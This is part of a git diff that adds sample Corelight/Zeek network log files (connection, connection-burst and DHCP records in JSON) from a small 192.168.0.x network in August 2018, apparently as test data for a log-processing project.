+{"ts":"2018-08-03T23:38:59.284934Z","uid":"CA9xsP22Ju0BIr0R2b","id.orig_h":"109.168.243.84","id.orig_p":52490,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"RU"} +{"ts":"2018-08-03T23:38:14.452390Z","uid":"Cj6p8DVVWByP6esE4","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.77.153","id.resp_p":443,"proto":"udp","duration":44.833648,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"HK"} +{"ts":"2018-08-03T23:38:59.284716Z","uid":"CwH4s81GUYvmZBGz2a","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"108.172.172.41","id.resp_p":45056,"proto":"udp","duration":0.020662,"orig_bytes":88,"resp_bytes":154,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":4,"orig_ip_bytes":200,"resp_pkts":7,"resp_ip_bytes":350,"tunnel_parents":[],"resp_cc":"CA"} +{"ts":"2018-08-03T23:38:59.307153Z","uid":"CntJQ37HnWYRnQjB3","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"41.178.226.192","id.resp_p":42127,"proto":"udp","duration":0.000012,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"EG"} +{"ts":"2018-08-03T23:38:59.280695Z","uid":"Cuekr12w6feSJGN3Pd","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"82.196.79.203","id.resp_p":64018,"proto":"udp","duration":0.033586,"orig_bytes":816,"resp_bytes":616,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":35,"orig_ip_bytes":1796,"resp_pkts":28,"resp_ip_bytes":1400,"tunnel_parents":[],"resp_cc":"RU"} +{"ts":"2018-08-03T23:38:59.875453Z","uid":"Cmlo642iIVR95gcpth","id.orig_h":"192.168.0.2","id.orig_p":3,"id.resp_h":"116.106.12.100","id.resp_p":10,"proto":"icmp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":75,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"VN"} +{"ts":"2018-08-03T23:38:59.886685Z","uid":"CCMWv51ye6N7d3vwZ9","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"181.166.214.34","id.resp_p":24163,"proto":"udp","duration":0.000121,"orig_bytes":90,"resp_bytes":0,"conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":5,"orig_ip_bytes":230,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"AR"} +{"ts":"2018-08-03T23:38:58.900979Z","uid":"C7j0kK3LbsiwywnHR1","id.orig_h":"37.113.135.20","id.orig_p":23221,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":47,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"RU"} +{"ts":"2018-08-03T23:38:15.393648Z","uid":"CcuRx42gzHsf8IyWFa","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.77.146","id.resp_p":443,"proto":"udp","duration":43.571823,"orig_bytes":18,"resp_bytes":52,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":2,"resp_ip_bytes":108,"tunnel_parents":[],"resp_cc":"HK"} +{"ts":"2018-08-03T23:38:21.488530Z","uid":"CwBz7k283qnrY1G3C","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.24","id.resp_p":443,"proto":"udp","duration":37.534503,"orig_bytes":54,"resp_bytes":104,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":3,"orig_ip_bytes":138,"resp_pkts":4,"resp_ip_bytes":216,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.288730Z","uid":"CgV4Rq4mULfGfcCwmd","id.orig_h":"70.48.138.88","id.orig_p":3,"id.resp_h":"192.168.0.54","id.resp_p":1,"proto":"icmp","conn_state":"OTH","local_orig":false,"local_resp":true,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":80,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"CA"} +{"ts":"2018-08-03T23:38:59.289238Z","uid":"CkhnAP1pPhPNjvI3Ng","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"190.88.150.6","id.resp_p":42285,"proto":"udp","duration":0.000006,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"CW"} +{"ts":"2018-08-03T23:38:59.304832Z","uid":"CvVYcx3vExjfwILFQg","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"64.4.23.140","id.resp_p":443,"proto":"udp","conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^d","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.307168Z","uid":"C99Xsy1SZ94ZVIdXd1","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.55.235.147","id.resp_p":443,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"IE"} +{"ts":"2018-08-03T23:38:59.280678Z","uid":"CsaSLq4ag8XtiYxvt4","id.orig_h":"162.253.130.90","id.orig_p":3,"id.resp_h":"192.168.0.54","id.resp_p":3,"proto":"icmp","duration":0.02791,"orig_bytes":4144,"resp_bytes":0,"conn_state":"OTH","local_orig":false,"local_resp":true,"missed_bytes":0,"orig_pkts":74,"orig_ip_bytes":6216,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"CA"} +{"ts":"2018-08-03T23:38:59.824656Z","uid":"CZxXNh2PrduLyJMZa7","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"177.3.93.142","id.resp_p":3892,"proto":"udp","duration":0.000084,"orig_bytes":54,"resp_bytes":104,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":3,"orig_ip_bytes":138,"resp_pkts":4,"resp_ip_bytes":216,"tunnel_parents":[],"resp_cc":"BR"} +{"ts":"2018-08-03T23:38:59.883311Z","uid":"CWJBPaI9e0QuH1mTl","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.77.174","id.resp_p":40021,"proto":"udp","duration":0.002513,"orig_bytes":304,"resp_bytes":108,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":2,"orig_ip_bytes":360,"resp_pkts":2,"resp_ip_bytes":164,"tunnel_parents":[],"resp_cc":"HK"} diff --git a/Sample Data/Custom/Corelight/conn_burst_20180803_16:37:28-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/conn_burst_20180803_16:37:28-16:40:00-0700.log_ new file mode 100644 index 0000000000..00297b3c30 --- /dev/null +++ b/Sample Data/Custom/Corelight/conn_burst_20180803_16:37:28-16:40:00-0700.log_ @@ -0,0 +1,2 @@ +{"ts":"2018-08-03T23:37:28.937335Z","uid":"CYEduc4AvbZxqylsqk","id.orig_h":"192.168.0.54","id.orig_p":49530,"id.resp_h":"191.234.4.50","id.resp_p":80,"proto":"tcp","orig_size":30615,"resp_size":107046238,"mbps":338.122437,"age_of_conn":2.413327} +{"ts":"2018-08-03T23:37:42.980914Z","uid":"CK3sI01OPsX7RoNlQ2","id.orig_h":"192.168.0.54","id.orig_p":49493,"id.resp_h":"195.12.232.163","id.resp_p":80,"proto":"tcp","orig_size":579,"resp_size":106980076,"mbps":362.046669,"age_of_conn":2.253853} diff --git a/Sample Data/Custom/Corelight/dhcp_20180803_16:37:08-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/dhcp_20180803_16:37:08-16:40:00-0700.log_ new file mode 100644 index 0000000000..94f9150054 --- /dev/null +++ b/Sample Data/Custom/Corelight/dhcp_20180803_16:37:08-16:40:00-0700.log_ @@ -0,0 +1,224 @@ +{"ts":"2018-08-03T23:37:08.138779Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":4244918360} +{"ts":"2018-08-03T23:37:08.260765Z","uid":"CurO5f3SueH6PswXx5","id.orig_h":"192.168.0.52","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:c0:d7","assigned_ip":"192.168.0.52","lease_time":86400.0,"trans_id":3157308673} +{"ts":"2018-08-03T23:37:15.497834Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":4244918360} +{"ts":"2018-08-03T23:37:17.781257Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":4244918360} +{"ts":"2018-08-03T23:37:20.458520Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":1533588649} +{"ts":"2018-08-03T23:37:20.458520Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":0.0,"trans_id":345148824} +{"ts":"2018-08-03T23:37:20.620446Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":0.0,"trans_id":595247298} +{"ts":"2018-08-03T23:37:21.051984Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":4244918360} +{"ts":"2018-08-03T23:37:21.130882Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":320548491} +{"ts":"2018-08-03T23:37:21.178594Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":4244918360} +{"ts":"2018-08-03T23:37:21.613466Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":4244918360} +{"ts":"2018-08-03T23:37:21.601011Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":1943483619} +{"ts":"2018-08-03T23:37:22.272792Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":104538547} +{"ts":"2018-08-03T23:37:23.090620Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":4284080028} +{"ts":"2018-08-03T23:37:23.090620Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3064449585} +{"ts":"2018-08-03T23:37:23.090620Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1349104179} +{"ts":"2018-08-03T23:37:23.090620Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1738116550} +{"ts":"2018-08-03T23:37:23.115995Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1581665870} +{"ts":"2018-08-03T23:37:23.091432Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":3783008091} +{"ts":"2018-08-03T23:37:23.318110Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":401535129} +{"ts":"2018-08-03T23:37:26.537530Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":4258157032} +{"ts":"2018-08-03T23:37:27.522527Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1058223435} +{"ts":"2018-08-03T23:37:35.284808Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":633407266} +{"ts":"2018-08-03T23:37:36.406549Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":235526865} +{"ts":"2018-08-03T23:37:37.196877Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":4280540248} +{"ts":"2018-08-03T23:37:37.208788Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":1492463779} +{"ts":"2018-08-03T23:37:39.895685Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":1898915930} +{"ts":"2018-08-03T23:37:39.907195Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":1307254381} +{"ts":"2018-08-03T23:37:39.907195Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3708477320} +{"ts":"2018-08-03T23:37:39.962800Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":965705047} +{"ts":"2018-08-03T23:37:39.977989Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":4104631267} +{"ts":"2018-08-03T23:37:40.725450Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":4051299215} +{"ts":"2018-08-03T23:37:40.725450Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2520688147} +{"ts":"2018-08-03T23:37:44.639395Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":135976770} +{"ts":"2018-08-03T23:37:44.639395Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":366427824} +{"ts":"2018-08-03T23:37:44.639395Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1970380470} +{"ts":"2018-08-03T23:37:44.639395Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":3191141787} +{"ts":"2018-08-03T23:37:44.639395Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1081072153} +{"ts":"2018-08-03T23:37:44.639698Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3584383287} +{"ts":"2018-08-03T23:37:44.822448Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":4280540248} +{"ts":"2018-08-03T23:37:46.000591Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":4280540248} +{"ts":"2018-08-03T23:37:46.075283Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":1505851115} +{"ts":"2018-08-03T23:37:46.075283Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":367050625} +{"ts":"2018-08-03T23:37:46.075283Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":835193129} +{"ts":"2018-08-03T23:37:46.293012Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3016138385} +{"ts":"2018-08-03T23:37:46.979938Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3405948036} +{"ts":"2018-08-03T23:37:47.278235Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":4147676994} +{"ts":"2018-08-03T23:37:47.566723Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3597766095} +{"ts":"2018-08-03T23:37:48.623513Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":410362668} +{"ts":"2018-08-03T23:37:49.764779Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":622082076} +{"ts":"2018-08-03T23:37:50.659945Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":4280540248} +{"ts":"2018-08-03T23:37:53.220855Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":2735539101} +{"ts":"2018-08-03T23:37:54.697530Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":4160718874} +{"ts":"2018-08-03T23:37:54.798752Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":346235421} +{"ts":"2018-08-03T23:37:54.798752Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":1835523647} +{"ts":"2018-08-03T23:37:54.825411Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":2045280298} +{"ts":"2018-08-03T23:37:55.182733Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":814809940} +{"ts":"2018-08-03T23:37:55.208015Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3836249552} +{"ts":"2018-08-03T23:37:55.253575Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":422924718} +{"ts":"2018-08-03T23:37:55.435567Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2794322351} +{"ts":"2018-08-03T23:37:55.597745Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":4280540248} +{"ts":"2018-08-03T23:37:55.877178Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":1849823208} +{"ts":"2018-08-03T23:37:55.881072Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":4280540248} +{"ts":"2018-08-03T23:37:56.699552Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":4011874975} +{"ts":"2018-08-03T23:37:56.740092Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":527230858} +{"ts":"2018-08-03T23:37:57.023222Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3961105925} 